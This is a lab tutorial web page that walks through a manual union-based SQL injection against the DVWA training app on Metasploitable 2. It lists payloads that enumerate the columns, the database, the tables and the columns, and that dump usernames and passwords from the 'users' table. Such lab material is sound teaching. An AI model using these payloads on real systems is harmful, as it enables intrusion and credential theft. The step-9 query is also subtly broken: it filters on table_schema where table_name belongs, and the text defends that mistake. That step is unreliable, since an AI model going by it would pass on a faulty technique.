top of page

Manual SQL Injection Attack

Lab Set up

  • Virtualization using Oracle Virtual box

  • Attacker’s System: Kali Linux

  • Target System : Metasploitable 2


1. In Kali Linux --> browser --> Visit Target Website.

Ex. DVWA (Damn Vulnerable Web Application). It is integrated in Metasploitable 2. Just put target's ip address in Kali Linux browser. Now click on DVWA. Put Username as 'admin' and Password as 'password'. Now go to DVWA security --> Make the security as 'low' and submit. This is done to let the attack work.


2. Click on SQL Injection tag.


3. First check if the response is coming from Database server. To check this simply type single quote i.e. ( ' ) in the input field to see if the page is SQL Injection vulnerable or not. If it is, it may also tell the database system it is using at the back end. This is known as error based SQL injection.


4. It will show that it is using MySql database. So we will use # for commenting.


5. Now we will try to inject a SQL query into input field. We wil use 'union' operator. But for using 'union' operator, the number of columns in both queries should be equal. Hence we will find number of columns first.


6. Now find total number of columns. We have to start from 1, till we get the result.

Ex. 'union select 1 #


OR


Ex. ’union select 1,2 #


Note: In MySql database system, there is a database called 'information_schema'. This contains metadata of all other databases within database system.

Inside 'information_schema' there are two important tables as 'tables' and 'columns'.

Inside table 'tables' there are two columns as 'table_name' and 'table_schema'. While inside table 'columns' there are three columns as 'table_name', 'table_schema' and 'column_name'.

Fig. information_schema database



7. Thus we got that there are 2 columns. Now find the database name.

Ex. ’union select 1,database() #


Now you will get all databases in the database system. We will choose them one by one or logically.

8. Now find the table name from the database 'dvwa'.

Ex. ’union select table_name,1 from information_schema.tables where table_schema=‘dvwa’ #

Here table_schema is nothing but the name of the database got from previous step.

Now you will get all tables from the database 'dvwa'.

9. Now find column name from the table 'users'.

Ex. ’union select column_name,1 from information_schema.columns where table_schema=‘users’ #

Here table_schema is nothing but the name of the table got from previous step.


Now you will get all columns from the table 'users'.

10. Now display username and password i.e. the column’s records.

Ex. ’union select user,password from users #

Now you will get all the records from table 'users' for columns 'username' and 'password'.


bottom of page